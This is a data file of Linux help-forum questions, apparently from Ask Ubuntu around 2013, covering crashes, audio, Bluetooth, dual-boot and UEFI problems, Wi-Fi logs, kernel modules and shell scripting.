299580	why running clamtk on 12.04 with kernel-update of today crashes the system ?	i am performing clamtk - virusscan as usual ( at a friends computer with 12.04 - updated today ) : sudo clamtk then normal scanning of all files . when reaching certain file , it crashes with logout to gdm-login-window . should i use clamtk-frontend only as normal user ? as a normal user the same happens again - after scanning first 99 files of whole file-system . when one time click on gdm-user then it crashes again , then back to gdm . again click on gdm-user and login works . from terminal with command clamtk it is running a bit longer - but still crashes and logout at once into gdm ? ? ? i found for to report crash : apport-retrace which is not installed by default ( contrary to earlier ubuntu-versions ) . made then : apt-get install -- reinstall clamtk and apt-get install -- reinstall gdm now i make reboot ( am back soon ... ) no change ... still crashes . then i tried apt-get install -- reinstall xserver-xorg ( suiting packages to installation ) but it is refused because of too many collisions ? ? ? ( on different machines was these packages to reinstall no problem ? )
299597	get pulseaudio current sample rate and bit rate	just bought sound blaster x-fi hd ( usb ) and i 'm trying to understand what is the current output ( sample rate and bit rate ) . i 've configured /etc/pulse/daemon.conf and set there the following values : default-sample-rate = 96000 default-sample-format = s24le how do i validate it ?
299598	how to enable my bluetooth adapter ?	i 'm using dell inspiron n4030 laptop . i 'm using ubuntu 13.04 64 bit . bluetooth adapter is not found . how to active that ? rfkill list 1 : phy1 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no
299606	ubuntu 13.04 claims my root password wrong	while opening the bleachbit ( as root ) , gedbi and bootup- manager , it asks for the root password and on entering the password shows that the password is wrong , for other things like updating , installing the software from ubuntu software center the same password works well due this problem i am not able to use boot up manager , gedbi , deepin-software-center and bleachbit ( as root ) i am using ubuntu 13.04 with gnome shell and password length is of one letter
299607	opening a track with banshee	how can i open a track with banshee using command line ? obviously banshee file.mp3 do n't work . is there another command ? see what i 'm trying to accomplish is to make puddletag to play tracks in banshee . there 's a preference `` programs to play files with '' in puddletag . i 've tried muinshee -- stop & & muinshee -- play . that should run as muinshee -- stop & & muinshee -- play < file > from puddletag . but this just stops and plays the currently playing track . not the file mentioned in the command .
299608	how can i restore session in firefox ?	when i start ubuntu 's version of firefox , there is no button restore previous session , just some ubuntu buttons . how can i restore the session in ubuntu 's version ?
299610	ubuntu 13.04 boots to busybox exit does n't work	i turned on my computer and i was sent to the busybox . i have not done anything to my computer and it worked fine last night . i tried typing exit and then pressing enter and it gives me an alert that says /host/ubuntu/disks/root.disk does not exist . i do n't know how to fix this can anyone help ? like i said it worked fine last night and when i turned it on today it gave me this . my computer is a dell studio xps that has dual boot to windows 8 .
299614	executing command line with other user	i 'm struggling with a problem , i 'm using ubuntu 10.04 lts , i have a command line `` wvdial brt '' wich i need to execute with every boot from my computer , i have 2 users in my computer and i have to execute this command from any of them , i tried to include this command in /etc/rc.local but when i log in with the another user the command does n't work , is there any other place more recommended to insert this command line ? i 'm doing something wrong ? thanks for your help .
299624	migrating to a different distro , but keeping files	i 'd like to test out a new linux distro ( arch-based ) by replacing a partition that already has ubuntu on it . i would n't like to lose all my files , and know that it would be easy to back up all the files temorariliy and then do a fresh install . however , since linux distros tends to use the same structure generally ( e.g . using /usr , /home , etc ) would it be possible to just change the operating system without having to overwrite these things ? thank you !
299628	no language switcher	after ( as i suppose ) updating my ubuntu 12.04 is refuses to change keyboard layout and only allows me to type in english . it even does n't show language bar at the top . what is the way to solve that problem ? /here are screens of 'keyboard layout ' and 'language support ' from my 'system settings'/
299636	sound is too fast in chrome using flash player	i have npapi flash player disabled and everything runs fine until i use vlc player . so , the thing is : i open chrome , then vlc , watch the movie there ( not necessary till the end ) , stop it and then open flash audio player . the audio is faster than normal . this effect persists until i logout or restart pulseaudio ( pulseaudio -k ) . so , this is definitely a bug . is there a workaround ?
299637	is buying merchandise or ubuntu one storage a viable alternative to donating ?	canonical offers merchandise and cloud storage ( ubuntu one ) . of course , just donating will make canonical more money then buying merchandise/cloud storage , but is buying merchandise and cloud storage still a viable alternative to donating ?
299640	black screen installing ubuntu server 12.04 64 bit	i am trying to install ubuntu server 12.04 64 bit via usb external hard drive . my processor does not have integrated graphics ( intel xeon e3 1230 v2 ) so i am forced to use a cheapo graphics card ( nvidia 7900 gs ) . my mother board is a supermicro x9sae-v . i can boot into the installer and select my language , but when i try to install the server the screen just turns black while the caps lock and scroll lock blink . i am not connected to the internet or any network at the moment . i have tried nomodeset boot option , does not work . i have tried unplugging my dvd drive , does nothing . i am running a software raid via raid mode on my motherboard . please respond asap , i am at the customers office .
299642	gnome-shell , use the hot corner to display application	i 'm currently tweaking my new gnome-shell inside a vm before doing it on my current laptop and i would like to know how to display the application drawer when the mouse go on the hot corner instead of the running applications . the best would be to display the application drawer from the hot corner and keep the running app with the windows key . anybody ever tried to do that ? i think that i need to modify some .js file inside /usr/share/gnome-shell/js/ui/ , but i did not figured out how . edit : i am able to remove the `` frequently used app '' tab ( from appdrawer.js ) , but i ca n't use the `` all apps '' tab as the main view of the hot corner .
299645	add option to `` extend to the left '' in xfce4 display settings	i have a shortcut to `` xfce4-display-settings -m '' that displays the following options when i have two monitors connected : laptop mirror displays extend to the right monitor i would like to also see `` extend to the left . '' what can i do to make that option appear ? note : i am running ubuntu 12.10 with xubuntu-desktop installed .
299657	left shift key acts like it 's held too long	i have an obscure problem with a logitech k810 bluetooth keyboard . everything works perfectly with the exception of the left shift key , it acts as though i have it pressed down for about two seconds longer than i really do . right shift key works properly , but the left one runs a little slow . i checked the keyboard out and it does n't appear to be getting physically stuck . i know it 's a small problem but it can be annoying when you type at 120wpm ! perhaps it is simply a glitch that can be solved by mapping the key to appear as the right shift key ? i have no idea which is why i 'm posing the question to you guys . anyone else has a similar issue ? running ubuntu 13.04 desktop 64-bit
299660	having trouble with boot menu	hey i 'm having trouble booting to ubuntu . please bear with me it 's my first time posting here . i was going through a couple of tutorials on speeding up your system and edited one of the values in the grub file located /etc/default/grub now the grub_timeout is set to '0 ' and when i start up my laptop it goes to the default os boot menu which is ubuntu . but it boots to windows instead of ubuntu which makes it very difficult to fix from windows . i have downloaded ext2explore to change the value which i can do but i ca n't update the grub so it does n't work . thanks for any help or suggestions .
299661	how to install bnetd in lubuntu from command line ?	i am trying to install bnetd on lubuntu and i got error compiling it ( i have never compiled anything yet ) i execute this at the terminal : loading cache ./config.cache checking host system type ... invalid configuration `x86_64-pc-linux-gnuoldld ' : machine `x86_64-pc ' not recognized checking target system type ... invalid configuration `x86_64-pc-linux-gnuoldld ' : machine `x86_64-pc ' not recognized checking build system type ... invalid configuration `x86_64-pc-linux-gnuoldld ' : machine `x86_64-pc ' not recognized checking for gcc ... no checking for cc ... no configure : error : no acceptable cc found in $ path and from the command : ls -l /home/andrey/desktop/bnetd-0.4.25/ i get this : total 132 -rw-r -- r -- 1 andrey andrey 50287 яну 21 2002 changelog drwxr-xr-x 2 andrey andrey 4096 май 24 23:04 conf -rw-r -- r -- 1 andrey andrey 17992 апр 26 2001 copying -rw-r -- r -- 1 andrey andrey 6326 яну 15 2002 credits drwxr-xr-x 2 andrey andrey 4096 май 24 23:04 docs drwxr-xr-x 2 andrey andrey 4096 май 24 23:04 files -rw-r -- r -- 1 andrey andrey 4723 апр 26 2001 install drwxr-xr-x 2 andrey andrey 4096 май 24 23:04 man drwxr-xr-x 3 andrey andrey 4096 май 24 23:04 packaging -rw-r -- r -- 1 andrey andrey 4997 ное 29 2001 readme drwxr-xr-x 2 andrey andrey 4096 май 24 23:04 scripts drwxr-xr-x 15 andrey andrey 4096 май 24 23:04 src -rw-r -- r -- 1 andrey andrey 5696 яну 17 2002 todo and in the tutorial i am reading it 's all fine . i cant understand where is my error . also i cant run make command because i still do n't have the make file ... i am using lxterminal
299671	impossible installing ubuntu 13.04 in uefi mode with windows 8 preinstalled	i know this is a dejavu but let me please explain my problem . when booting 13.04 installation media efi mode get to a black screen with grub version 2.00-l3ubuntu3 version appears after selecting `` install '' or `` try ubuntu '' , there appear error messages : - failure reading sector ... from 'cd0' - you need to load the kernel first i have a dell vostro 3560 with windows 8 . i have downloaded and burned ubuntu-13.04-desktop-amd64.iso . hashes checked . i 've booted from the dvd with secure boot enabled . the same happens when secure boot is disable . when booting with legacy bios , installation starts . i tried ubuntu without installing and looks ok . but , i did not follow the installation because in https : //help.ubuntu.com/community/uefi # converting_ubuntu_into_efi_mode there appears `` if the other systems ( windows vista/7/8 , gnu/linux ... ) of your computer are installed in efi mode , then you must install ubuntu in efi mode too . `` , which is the case in my computer . i have read many similar questions and the corresponding answers from people in this forum , but till now i have n't found a solution . could someone help me on this subject ? thanks in advance !
299672	authentication in wireless network	i am authenticating a network using wpa2 , but not working ( authenticates then off ) os : ubuntu 13.04 wireless network card : intel corporation ultimate n wifi link 5300 $ dmesg : [ 1248.966666 ] wlan0 : authenticate with 00:20 : a6 : bb : ff : e1 [ 1248.969571 ] wlan0 : send auth to 00:20 : a6 : bb : ff : e1 ( try 1/3 ) [ 1248.986155 ] wlan0 : authenticated [ 1248.986417 ] iwlwifi 0000:02:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 1248.986425 ] iwlwifi 0000:02:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 1248.988049 ] wlan0 : associate with 00:20 : a6 : bb : ff : e1 ( try 1/3 ) [ 1248.990384 ] wlan0 : rx assocresp from 00:20 : a6 : bb : ff : e1 ( capab=0x31 status=0 aid=1 ) [ 1248.995162 ] wlan0 : associated [ 1251.042674 ] wlan0 : disassociating from 00:20 : a6 : bb : ff : e1 by local choice ( reason=3 ) [ 1251.201126 ] cfg80211 : calling crda to update world regulatory domain [ 1251.201392 ] wlan0 : deauthenticating from 00:20 : a6 : bb : ff : e1 by local choice ( reason=3 ) [ 1251.209426 ] cfg80211 : world regulatory domain updated : [ 1251.209433 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1251.209438 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1251.209442 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1251.209446 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1251.209450 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1251.209453 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) root @ jafa : ~ # $ lshw *-network description : wireless interface product : ultimate n wifi link 5300 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 00:21:6a:93 : b4:48 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-21-generic firmware=8.83.5.1 build 33692 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:47 memory : f4200000-f4201fff $ iwlist wlan0 genie wlan0 no generic ie ( operation not supported ) . $ sudo iwlist wlan0 encryption [ sudo ] password for josimar : wlan0 2 key sizes : 40 , 104bits 4 keys available : [ 1 ] : off [ 2 ] : off [ 3 ] : off [ 4 ] : off current transmit key : [ 1 ] $ lsusb 02:00.0 network controller : intel corporation ultimate n wifi link 5300 subsystem : intel corporation device 1101 flags : bus master , fast devsel , latency 0 , irq 47 memory at f4200000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ c8 ] power management version 3 capabilities : [ d0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ e0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-21-6a-ff-ff-93-b4-48 kernel driver in use : iwlwifi lsmod module size used by pci_stub 12550 1 vboxpci 22896 0 vboxnetadp 25636 0 vboxnetflt 27261 0 vboxdrv 285137 3 vboxnetadp , vboxnetflt , vboxpci parport_pc 27504 0 ppdev 12817 0 bnep 17669 2 rfcomm 37420 0 bluetooth 202069 10 bnep , rfcomm snd_hda_codec_realtek 63791 1 binfmt_misc 17260 1 uvcvideo 71279 0 videobuf2_vmalloc 12920 1 uvcvideo videobuf2_memops 13042 1 videobuf2_vmalloc videobuf2_core 39161 1 uvcvideo videodev 95806 2 uvcvideo , videobuf2_core joydev 17097 0 arc4 12543 2 iwldvm 220185 0 mac80211 526519 1 iwldvm coretemp 13131 0 snd_hda_intel 38307 5 snd_hda_codec 117580 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13272 1 snd_hda_codec snd_pcm 80890 3 snd_hda_codec , snd_hda_intel snd_page_alloc 14230 2 snd_pcm , snd_hda_intel snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_rawmidi 25114 1 snd_seq_midi iwlwifi 155077 1 iwldvm i915 535507 4 drm_kms_helper 47545 1 i915 snd_seq 51280 2 snd_seq_midi_event , snd_seq_midi microcode 18286 0 cfg80211 436177 3 iwlwifi , mac80211 , iwldvm drm 228750 5 i915 , drm_kms_helper snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 24411 2 snd_pcm , snd_seq psmouse 81038 0 serio_raw 13031 0 lpc_ich 16925 0 i2c_algo_bit 13197 1 i915 wmi 18590 0 snd 56485 18 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device jmb38x_ms 17177 0 memstick 15842 1 jmb38x_ms soundcore 12600 1 snd video 18894 1 i915 mac_hid 13037 0 lp 13299 0 parport 40753 3 lp , ppdev , parport_pc hid_generic 12484 0 usbhid 41805 0 hid 82666 2 hid_generic , usbhid firewire_ohci 35292 0 sdhci_pci 18158 0 ahci 25507 4 sdhci 31824 1 sdhci_pci firewire_core 61718 1 firewire_ohci libahci 26108 1 ahci r8169 61531 0 crc_itu_t
299674	ubuntu one on windows : pointing to the right desktop	ubuntu one syncs my ubuntu `` desktop '' folder in the cloud , named `` bureau '' ( french ) with path /home/username/bureau . ubuntu one on windows 8 syncs this folder with a windows 8 folder c : \users\user_000\bureau , created by the ubuntu one sync . however , in windows 8 , the default folder for the desktop view is c : \users\user_000\desktop . is this a bug or a configuration option in ubuntu one ? thanks .
299675	how do i get a blackgold tv tuner working ?	i 've bought a duel pci-e freeview blackgold tv tuner in the past , and have been unable to get it working under linux . they have released the source code . how do i get this integrated into the ubuntu 13.04/14.04 kernel ? http : //shop.blackgold.tv/epages/bt3159.sf/en_gb/ ? objectpath=/shops/bt3159/categories/support/current_drivers lspci output ... 00:00.0 memory controller : nvidia corporation ck804 memory controller ( rev a4 ) 00:01.0 isa bridge : nvidia corporation ck804 isa bridge ( rev b1 ) 00:01.1 smbus : nvidia corporation ck804 smbus ( rev a2 ) 00:02.0 usb controller : nvidia corporation ck804 usb controller ( rev a2 ) 00:02.1 usb controller : nvidia corporation ck804 usb controller ( rev a4 ) 00:06.0 ide interface : nvidia corporation ck804 ide ( rev f3 ) 00:07.0 ide interface : nvidia corporation ck804 serial ata controller ( rev f3 ) 00:08.0 ide interface : nvidia corporation ck804 serial ata controller ( rev f3 ) 00:09.0 pci bridge : nvidia corporation ck804 pci bridge ( rev a2 ) 00:0a.0 bridge : nvidia corporation ck804 ethernet controller ( rev a3 ) 00:0b.0 pci bridge : nvidia corporation ck804 pcie bridge ( rev a3 ) 00:0c.0 pci bridge : nvidia corporation ck804 pcie bridge ( rev a3 ) 00:0d.0 pci bridge : nvidia corporation ck804 pcie bridge ( rev a3 ) 00:0e.0 pci bridge : nvidia corporation ck804 pcie bridge ( rev a3 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:09.0 multimedia audio controller : creative labs sb audigy ( rev 04 ) 01:09.1 input device controller : creative labs sb audigy game port ( rev 04 ) 01:09.2 firewire ( ieee 1394 ) : creative labs sb audigy firewire port ( rev 04 ) 03:00.0 multimedia controller : philips semiconductors saa7231 ( rev aa ) 04:00.0 ethernet controller : qualcomm atheros ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) 05:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv630 xt [ radeon hd 2600 xt ] 05:00.1 audio device : advanced micro devices , inc. [ amd/ati ] rv630 hdmi audio [ radeon hd 2600 series ]
299676	how to install 3rd party module so that it is loaded on boot ?	i have a third party module to go with a frame grabber . i 've downloaded the kernel source , followed the vendor 's instructions to compile it , and have the resulting module , arvdrv.ko , sitting in a folder . the vendor has supplied a script that loads the module into the kernel and it works when i run it ; the module is loaded but only until the next boot . the script does not use modprobe . i can access the frame grabber when the module is installed . it appears to me that modprobe maintains a list of many modules . one can edit /etc/modules to add a module name and it will load at boot but the module arvdrv is not in modprobe 's list . my question is how to let modprobe know of the module ? does it need to be copied to a new location and if so where ?
299680	is the create disk image in the disks utility like clonezilla ?	in ubuntu 13.04 , the gui disks utility has the `` create disk image '' feature . is it like a disk image that clonezilla can produce ? if yes , let say i save an image of my hdd which contains my os to another hdd . after some time , if i 'm not happy with the state of my os , can i go back to the saved state using the restore disk image feature of the disks utility ?
299682	how do i remove my old ubuntu installation and install a new install without affecting my windows 8 install	i have downloaded ubuntu 12.04 64 bit for my laptop , as i installed 13.04 and i have quite a few bugs and errors . since 12.04 is the most stable version and it 's also lts , i will stay with that one . i have a few questions though , since i 'm still new to ubuntu . how can i install 12.04 and delete my 13.04 installation , without touching at all my windows 8 installation , as i am running dual boot , and installed 13.04 alongside windows 8 .
299688	can i make a game use fxaa using nvidia application profiles ?	i would like to be able to run team fortress 2 with fxaa enabled , but the only way i know how is to turn on in nvidia settings `` enhance application settings '' which effects all games and apps using opengl . i see that in the latest beta driver they 've added `` application profile '' support , which looks to allow you to have special settings for single apps . is their any way i could use this to enable fxaa just for team fortress 2 ?
299689	tail : inotify can not be used , reverting to polling : too many open files	when i try to tail -f catalina.out , i get the error : tail : inotify can not be used , reverting to polling : too many open files i tried the answer in this post : too many open files - how to find the culprit lsof | awk ' { print $ 2 ; } ' | sort -rn | uniq -c | sort -rn | head when i ran the above command , the output was 17 6115 13 6413 10 6417 10 6415 9 6418 9 6416 9 6414 8 6419 4 9 4 8 i do n't see any process having 1024 files open . is n't the number of files open 17,13,10,10,9 ? or am i understanding it wrong ? and all these were bash , sshd , apache2 , tomcat had number 4 . i also did lsof | grep tail | wc -l which returned 20 . these numbers are n't huge , so why does tail -f catalina.out fail ?
299690	the relationship between initrd and squashfs	if we are using initrd for , say in live usb , why would we also need squashfs ? can anyone explain please ? thanks
299697	how do i get unity panel , dash , and launcher back after kernel upgrade ?	i have just upgraded the kernel on my 64-bit ubuntu 13.04 to 3.8.0-22-generic . now my unity panel , dash and launcher are missing and graphics are running really slowly . compiz and opengl seem to be failing . i 've tried reinstalling catalyst 13.4 but that does not fix it . i also tried these commands : dconf reset -f /org/compiz/ unity -- reset-icons & disown this happened once before and i think the above commands worked , but i 'm not having and success this time . the last command gives these errors : [ 1 ] 2616 compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - error : another window manager is already running on screen : 0 compiz ( core ) - info : stopping plugin : core compiz ( core ) - info : unloading plugin : core unity -- reset-ico ( process:2656 ) : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed please help ! update 1:30pm est 25 may 2013 : well today i just started up as normal and everything is working ; my launcher icons reset to default , which i am guessing was the result of the second command above . weird . florian , here is the output of the two commands you asked me to run ( now after it seems to be working ) : $ /usr/lib/nux/unity_support_test -p opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6670 opengl version string : 4.2.12217 compatibility profile context 12.104 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes and ... $ sudo -- lshw -c display *-display description : vga compatible controller product : turks xt [ radeon hd 6670 ] vendor : advanced micro devices [ amd ] nee ati physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:54 memory : d0000000-dfffffff memory : fe9e0000-fe9fffff ioport : e000 ( size=256 ) memory : fe9c0000-fe9dffff update 1 june 2013 : i had the same problem today after upgrading to kernel 3.8.0-23-generic and was able to get things back by running the first command only , then reinstalling amd catalyst 13.4 once again . is there any way to prevent having to do this with each kernel update ? is this an ubuntu bug or an amd catalyst bug ?
299705	ubuntu 12.04.2 wired internet does n't work ( `` cable unplugged '' )	its a fresh install of 12.04.2 . i can get wired internet if i boot into the livecd but not on the newly installed system . when i installed i had to use nomodeset and b43.blacklist=yes . has this edited a configuration file or disabled wired internet in some way ?
299710	how to determine if a string is a substring of another in bash ?	i want to see if a string is inside a portion of another string . e.g . : 'ab ' in 'abc ' - > true 'ab ' in 'bcd ' - > false how can i do this in a conditional of a bash script ?
299712	installing ubuntu touch on nexus 10 error autodeploy	i can not get my nexus 10 to boot up , it is stuck in ubuntu recovery . it says on the bottom left that autodeploy.zip not found . is there anyway to sideloade ?
299718	how should i configure ubuntu firewall ?	just discovered gufw , and i 'd like to set it up . but i have n't found any documentation telling me what i should/should not allow . i 'd like to be able to use it but the only documentation on the web seems to be instructions for how to create rules - little or no actual guidance as to what those rules should be ! could someone please guide me ? if it helps , i use my computer for the following : browsing the web ( firefox ) checking email ( web based thru firefox ) watching videos online ( youtube and streaming such as 4od , bbc iplayer ) listening to radio online downloading music ( have n't actually done it yet but will probably use ubuntu one , or amazon ) i also use digital camera and ipod but i assume they wo n't be affected by firewall ? i also have a network printer connected wirelessly . thanks for the help guys .
299722	windows 8 + ubuntu dual boot	i installed ubuntu 13.04 on windows 8 . yes i can access both of them , but the process is kind of long . in bios , efi is for windows 8 , legacy support is for ubuntu . if i choose efi first , the startup just go straight to win8 without offering me a choice . if i choose legacy first , the starup will offer me a choice between win8 and ubuntu . but i can only choose ubuntu . if i choose win8 , there will be a mistake ( file missing under configuration ) . that is to say , every time i wan na switch to another os , i have to go into bios and change the priority settings . i heard something about secure boot might be the cause of this situation . but the thing is that there is not even an option called `` secure boot '' in my bios , which means i can not disable it . all i want is that an option menu appears everytime i turn on my computer so i can easily choose what os i want for today . can anyone help me plz ? thank you very much ! !
299723	failed to install ubuntu touch on the nexus 10 , what can i do now ?	i followed instructions on how to install touch ubuntu on my nexus 10 . everything seemed to be going by just fine until the end . pushing /home/joshua/downloads/phablet-flash/135/raring-preinstalled-phablet-armhf.zip to /sdcard/autodeploy.zip error : device not found error while executing adb push /home/joshua/downloads/phablet-flash/135/raring-preinstalled-phablet-armhf.zip /sdcard/autodeploy.zip make sure the device is connected and viewable by running 'adb devices ' ensure you have a root device , one which running 'adb root ' does not return an error i did not root my nexus 10 because the instructions did not say to ... . probably common sense i know , but i over looked it . now i only get this message . now it will only show google when booting up and then turns off and i just get a battery sign . i am able to boot up into clockwork recovery but thats about it . any help ? is there any way i can sideload ? is there anything i can do ?
299727	default running	i want to make my minecraft skin viewer not have to be put into the terminal like user @ chrubuntu~ $ wine '/home/user/documents/mcsv.exe' i just want to be able to double click the .exe file and it will run . how can i do that ?
299733	keep processes running after logout	i do n't really want my brother on my computer without my permission , but i am running a minecraft server and if i logout using ctrl + shift + l the server stops . is there a way to fix this ?
299741	13.04 : : setting up hibernate + encryped swap under full disk encryption	so i recently installed 13.04 and chose full disk encryption ( i did n't bother to encrypt home too - seemed pointless ) , and i 'm wanting to encrypt my swap drive , and also enable hibernate so i can be as secure as possible . i have n't been able to find much information that pertains to my exact set of circumstances , and although i found this webpage ( https : //help.ubuntu.com/community/enablehibernatewithencryptedswap ) , it says it has only been tested with 12.04 . in any case , i went ahead and tried that and once i got to step 6 under `` how to setup hibernation '' , i got an error stating that : swapon : /dev/mapper/ubuntu -- vg-swap_1 : read swap header failed : invalid argument i do n't know if i 've fubared it or if a few commands can fix it , it does n't really matter because i did all of this on a fresh install and there is no files i 'm worried about losing . can anyone help me get this working ?
299743	how to change font color of subtitles in totem movie player	is there a way to change the font color , not the size , of subtitles in totem movie player ? i would like to change the color to some kind of yellow so there is more contrast between the movie and the subtitles .
299745	configure owner and permissions for upstart log files	when logging an upstart job with the standard console log stanza , can the resulting log files in /var/log/upstart be configured to be written with a mode or owner other than the default ?
299747	converting epub files to pdf format	i would like to know the ways in which epub files can be converted to pdf in ubuntu . any method , gui or command line conversion is fine as far as my epub gets converted to pdf . thanks .
299749	can you run linux mint in a virtual box on linux mint ?	ok , so to clarify , say i was running mint 14 , and i made a vbox , could i have the vbox run mint 14 ? the reason i am asking this is because i am trying to run different guis on mint , currently i 'm using kde . i am trying to run gnome 3 and unity , but when i switch guis they are both extremely slow , and it seems like they are missing some things . for example , there is about 4 different applications missing from the launcher in unity . so , i want to run them in the vbox to try and diagnose the problem , and if they do freeze i can just close the vbox window . i am not that skilled with computers and am still getting used to linux ( i have only known about it for 6 months ) so please break down your responses into basic thorough steps . also , if the answer to my question is yes , then would i have to re-download mint and save it as an iso or is it stored somewhere on my pc ? because right now i am getting the error message : `` fatal : no bootable medium found ! system halted ! '' i dont know exactly what this means or how to explain it , but i read that it basically means i need to give the vbox an iso file to work with .
299755	grep list for text with 2 numbers and 2 letters	i have a list of hex numbers from 0000 to ffff . i am trying to parse the list to only include text with 2 numbers 0-9 and 2 letters a-f , but am having no luck . i have been trying egrep -v [ 0-9 ] { 3 } and outputting the results to a file thinking that would find any entry without 3 numbers and then taking that file and doing egrep -v [ 0-9 ] { 4 } against the out from the previous command , but this is n't working as i still have entries with 3 and 4 numbers . i was planning on also running egrep -v [ a-f ] { 3 } and egrep -v [ a-f ] { 4 } to filter the rest but it is still not working . any suggestions would be greatly appreciated .
299756	how do i change my default country ?	i 've been using ubuntu for about 3 months and my computer for some random reason wants to believe that i live in haiti when in reality i live in the us , this problem has caused me not to be able to play games that donât have servers in haiti . would anyone happen to know how to solve my issue ?
299759	gedit terminal background image	is there a way to make the gedit embedded terminal have a custom background image instead of just a color ? i 've gone through all the options i can think of and have n't found anything . i have dconf-tools and gconf-editor i 've been using to look for the option , is there some other tool i can use ?
299765	does installing ubuntu dual boot with windows 8 preinstalled via liveusb overwrite windows bootloader ?	i have used ubuntu a lot , mostly through dual boot with windows . i had recently purchased new laptop with windows 8 , on which i tried to install ubuntu 12.04.2 amd64 through wubi like before but i could not . i searched many questions here and came to conclusion that wubi just wo n't install on system with uefi , because it is not campatible with gpt . so i had to look for other ways . mainly i want to keep my uefi/safe mode setting so that i am able to boot windows 8 . i tried to follow this post : https : //help.ubuntu.com/community/uefi to install ubuntu . i have two problems : not an issue faced yet , but it says in the guide to run boot-repair . why is it required and does it modify the main windows bootloader . the problem happens when i boot via liveusb just ( to test the possibility ) . i reach a screen which is similar to one under if the bios is set up to boot the cd in efi mode . but there are three such menus with teeny tiny fonts squeezed in the same screen space . same menu but three times , moving cursor shows changes in all of them . i am not sure what to do here . is it a known bug ? what should i do to install ubuntu dual boot with windows 8 . has anyone successfully installed ubuntu this way . please help .
299766	error : unknown filesystem help !	ok , i am new to ubuntu and know almost no terminology and do n't know a whole lot about computers . so i wanted to install ubuntu so i burned it onto a flashdrive and when i tried booting it i got , remove disks or other media . press any key to restart error : unknown filesystem grub rescue > ok so i have no clue what to do , i ca n't boot from my hard drive , as if it thinks i still have my flash drive in or i think that 's what it 's doing . i did have windows 7 and trying to boot that is not working . please help me ! ! !
299769	beats audio driver for hp dv6-7040tx	here is the model of my laptop : http : //www.gadgetsguru.com/hp-dv6-7040tx-lowest-price-spec-cheap-sale-india-15613.aspx as the specs say , it has quad speakers with a sub-woofer ... when i was using windows 8 , i had no problems . but , now only two speakers work and no sub-woofer . i recently switched over to ubuntu and i 'm a newbie : ) .. please post a step-by-step guide for installing audio driver . i heard that alsa is pre installed in ubuntu 13.04 thanks for your replies : )
299776	wallpaper goes back to default after restarting the computer	i 'm new to ubuntu , installed it a few days ago after a friend recommended it to me.so far so good , i like it and everything is fine with it , except for one problem.it is n't a major problem , but i 'd be happy to get it fixed.the wallpaper always goes back to the default one after i shut down or restart the computer.the thing is that the wallpaper that i selected over the default one is still selected in the `` appearance '' panel , so it 's not like the setting is n't saved or something.also , when i enter there to change the wallpaper , it goes back to the one that i was using.i only have to enter there and without touching anything , it changes back to mine . long story short : i change the wallpaper , i restart/shut down , the wallpaper is back to the default one and if i enter `` appearance '' , it automatically goes back to the one i had , without me re-selecting it . any way to make it stay after restart/shut down without me always going to `` appearance '' ?
299779	installing ubuntu 13.04 gets me to a blank screen	i have a hp touchsmart 300 running win 7 64 bit .i tried to install ubuntu 13.04 but when i boot and try to install it i see some commands running and then a blank screen . is there any way i can get out of this problem .
299780	taking the cores offline	i have intel® core™ i7-2670qm cpu @ 2.20ghz × 8 process which has 4 physical cores and 4 logical cores . most of the time i been on askubuntu , watching videos , basically no processor hungry stuff . so i was thinking to take cores offline but i have few question , i know i can take the core offline cat /sys/devices/system/cpu/cpu7/online 1 echo 0 > /sys/devices/system/cpu/cpu7/online so my question is : is it safe to take core/cores offline ? is it possible that my app crash ? does taking the cores offline save power ( on battery ) ?
